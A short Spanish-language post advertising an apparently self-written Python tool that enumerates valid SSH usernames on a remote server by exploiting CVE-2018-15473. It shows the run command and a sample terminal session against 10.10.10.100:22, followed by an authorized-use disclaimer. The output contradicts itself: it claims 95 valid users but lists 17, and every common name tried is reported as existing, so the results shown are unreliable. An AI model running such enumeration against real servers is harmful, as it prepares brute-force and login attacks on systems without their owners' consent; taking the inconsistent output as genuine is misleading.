
código python usado para verificar si hay usuario en ssh
Una herramienta en Python desarrollada por mí para identificar nombres de usuario SSH válidos explotando CVE-2018-15473.
python3 enum_ssh.py usernames.txt
Donde usernames.txt contiene la lista de nombres de usuario a probar.
[parrot@parrot]-[~]
$ python3 enum_ssh.py usernames.txt
[*] Starting CVE-2018-15473 enumeration against 10.10.10.100:22
[*] Using wordlist: usernames.txt
[+] [EXISTS] -> root
[+] [EXISTS] -> admin
[+] [EXISTS] -> administrator
[+] [EXISTS] -> user
[+] [EXISTS] -> test
[+] [EXISTS] -> guest
[+] [EXISTS] -> demo
[+] [EXISTS] -> operator
[+] [EXISTS] -> sysadmin
[+] [EXISTS] -> security
[+] [EXISTS] -> netadmin
[+] [EXISTS] -> webmaster
[+] [EXISTS] -> support
[+] [EXISTS] -> service
[+] [EXISTS] -> ubuntu
[+] [EXISTS] -> debian
[+] [EXISTS] -> centos
[+] [EXISTS] -> fedora
[+] [EXISTS] -> kali
[+] [EXISTS] -> parrot
========================================
[*] Scan complete.
[*] Found 95 valid user(s):
- root
- admin
- administrator
- user
- test
- guest
- demo
- operator
- sysadmin
- security
- netadmin
- webmaster
- support
- service
- ubuntu
- debian
- centos
========================================
Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas. Úsala solo en sistemas para los cuales tengas permiso explícito.